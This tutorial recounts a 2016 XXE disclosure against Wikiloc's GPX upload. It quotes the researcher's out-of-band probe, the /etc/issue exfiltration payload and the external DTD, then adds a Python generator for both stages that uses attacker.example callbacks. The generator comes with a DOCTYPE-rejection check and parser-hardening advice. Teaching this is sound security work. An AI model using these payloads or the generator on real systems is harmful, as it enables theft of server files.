On January 11th, 2016, a researcher named David Sopas published a report about an XXE in an application named Wikiloc, which is an application for sharing the best outdoor trails for hiking, cycling, and many other activities. This website/app has more than a million members, so the amount of user data at stake is considerable.
David Sopas registered an account in the application while looking for a cycling trail, but ended up exploiting a vulnerability. Yes, you know, these things happen.
He started by analyzing the upload request. He downloaded a .gpx file to learn the XML structure Wikiloc expects, then modified it so that the document declared an external entity and referenced it from the track name:
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>
    <gpx version="1.0" creator="GPSBabel - http://www.gpsbabel.org" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.topografix.com/GPX/1/0" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
      <time>2015-10-29T12:53:09Z</time>
      <bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
      <trk>
        <name>&xxe;</name>
        <trkseg>
          <trkpt lat="40.737758000" lon="-8.093361000">
            <ele>178.000000</ele>
            <time>2009-01-10T14:18:10Z</time>
    (...)
The difference between this vulnerability and the Facebook vulnerability that I explained before is that, here, David Sopas did not need an external DTD file for the first test: the entity is declared inline in the DOCTYPE's internal subset, and the reference &xxe; is placed in an element (<name>) that the parser reads as text content, because he kept the exact structure of the file he downloaded.
After he uploaded the file, his own web server logged the callback. This is a blind, out-of-band confirmation: the application's response shows nothing, but the log proves the Wikiloc back end fetched the URL while expanding the entity:
    GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51
David Sopas verified that the IP address belonged to a Wikiloc server (the User-Agent also reveals that the document was parsed by a Java 1.7 runtime) and, after confirming this, he modified the XML file again:
    <!DOCTYPE roottag [
      <!ENTITY % file SYSTEM "file:///etc/issue">
      <!ENTITY % dtd SYSTEM "http://www.davidsopas.com/poc/xxe.dtd">
      %dtd;
    ]>
    <gpx version="1.0" creator="GPSBabel - http://www.gpsbabel.org" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.topografix.com/GPX/1/0" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
      <time>2015-10-29T12:53:09Z</time>
      <bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
      <trk>
        <name>&send;</name>
    (...)
This time the payload declares two parameter entities: %file points at the file to read (/etc/issue) and %dtd loads a DTD hosted on his server. The extra step is unavoidable: the XML specification forbids parameter-entity references inside markup declarations in the internal subset, so an entity whose value embeds %file; has to be built in an external DTD. That is why he needed to create one:
    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://www.davidsopas.com/XXE?%file;'>">
    %all;
We can take a tip from this report. For testing purposes, download a valid XML document from the application and add a small external-entity declaration plus one reference to it; a single request to your own host is enough to confirm that the parser is vulnerable. It works reliably because you are following the XML structure the application already accepts, so the only thing that changes is the entity. Note that the content of %file; travels in a URL, so this exfiltration trick works for short, single-line files such as /etc/issue; multi-line files or files with characters that are illegal in a URL will break the request.
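The following Python script applies that tip and both stages of the report as an added example; it is not code from David Sopas's write-up or from Wikiloc. It takes a valid GPX document (a constructed sample is embedded), prepends either the stage-1 probe DOCTYPE or the stage-2 parameter-entity DOCTYPE, places the entity reference in the <name> element, and emits the external DTD to host for stage 2. The callback URL and DTD URL are placeholders. The last two functions show the server-side counterpart: refuse any upload that carries a DOCTYPE before it reaches the parser.

```python
"""Build the two-stage XXE payloads from a valid GPX file, then show the
server-side check that defeats them.

Added example for this section; not code from David Sopas's report or
from Wikiloc. Callback/DTD URLs and the sample GPX are constructed.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: a minimal valid GPX track, as an app would let you download.
SAMPLE_GPX = """<?xml version="1.0" encoding="UTF-8"?>
<gpx version="1.0" creator="example" xmlns="http://www.topografix.com/GPX/1/0">
  <time>2015-10-29T12:53:09Z</time>
  <trk>
    <name>Morning ride</name>
    <trkseg>
      <trkpt lat="40.737758000" lon="-8.093361000"><ele>178.000000</ele></trkpt>
    </trkseg>
  </trk>
</gpx>
"""

CALLBACK = "http://attacker.example/XXE"          # assumed: a host you control
DTD_URL = "http://attacker.example/poc/xxe.dtd"   # assumed: where exfil_dtd() is served

_DECL_RE = re.compile(r"^<\?xml[^>]*\?>\s*")
_NAME_RE = re.compile(r"(<name>)(.*?)(</name>)", re.S)


def _inject(gpx: str, doctype: str, entity_ref: str) -> str:
    """Keep the document's own structure: insert a DOCTYPE right after the
    XML declaration and put the entity reference in the first <name>, which
    the parser must read as text content."""
    m = _DECL_RE.match(gpx)
    decl, body = (m.group(0), gpx[m.end():]) if m else ("", gpx)
    if not _NAME_RE.search(body):
        raise ValueError("no <name> element to carry the entity reference")
    body = _NAME_RE.sub(lambda n: n.group(1) + entity_ref + n.group(3), body, count=1)
    return decl + doctype + "\n" + body


def oob_probe(gpx: str, callback: str = CALLBACK) -> str:
    """Stage 1: a general entity whose SYSTEM id is a URL on your host.
    A hit in your web server log proves the parser resolves external
    entities, even when nothing is reflected in the application's response."""
    doctype = f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback}">]>'
    return _inject(gpx, doctype, "&xxe;")


def exfil_payload(gpx: str, target: str = "file:///etc/issue",
                  dtd_url: str = DTD_URL) -> str:
    """Stage 2: %file holds the target's content, %dtd pulls the external
    DTD that builds the 'send' entity. The nesting cannot be written in the
    internal subset (parameter-entity references are not allowed inside
    markup declarations there), hence the separately hosted DTD."""
    doctype = ("<!DOCTYPE roottag [\n"
               f'  <!ENTITY % file SYSTEM "{target}">\n'
               f'  <!ENTITY % dtd SYSTEM "{dtd_url}">\n'
               "  %dtd;\n"
               "]>")
    return _inject(gpx, doctype, "&send;")


def exfil_dtd(callback: str = CALLBACK) -> str:
    """Body to serve at DTD_URL: 'send' becomes callback?<contents of %file>.
    Only short, single-line targets without URL-breaking characters survive
    this trick, which is why /etc/issue is a sensible first target."""
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            f"<!ENTITY % all \"<!ENTITY send SYSTEM '{callback}?%file;'>\">\n"
            "%all;\n")


def rejects_doctype(xml_text: str) -> bool:
    """Server-side counterpart: GPX needs no DTD, so refuse any upload that
    carries a DOCTYPE before it reaches the parser. True means rejected."""
    return re.search(r"<!DOCTYPE", xml_text, re.I) is not None


def parse_gpx_safely(xml_text: str) -> ET.Element:
    """Reject DOCTYPE-bearing uploads, then parse. Without a DTD there are no
    entities to expand, so neither stage above has anything to work with."""
    if rejects_doctype(xml_text):
        raise ValueError("DOCTYPE not allowed in uploaded GPX")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print(oob_probe(SAMPLE_GPX))
    print(exfil_payload(SAMPLE_GPX))
    print(exfil_dtd())
    print(parse_gpx_safely(SAMPLE_GPX).tag)
```

Serve the output of exfil_dtd() at DTD_URL, upload the output of exfil_payload(), and watch your web server log for the GET /XXE?... request carrying the file's content. The DOCTYPE pre-filter in rejects_doctype() is a demonstration of the idea, not a substitute for parser hardening: a text match can be sidestepped by encoding tricks, so the real fix is to configure the XML parser itself to refuse DTDs (for the Java parsers Wikiloc's User-Agent points at, the `http://apache.org/xml/features/disallow-doctype-decl` feature on DocumentBuilderFactory does exactly that).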
If you want to read more about this bug, visit the following link: https://www.davidsopas.com/wikiloc-xxe-vulnerability/.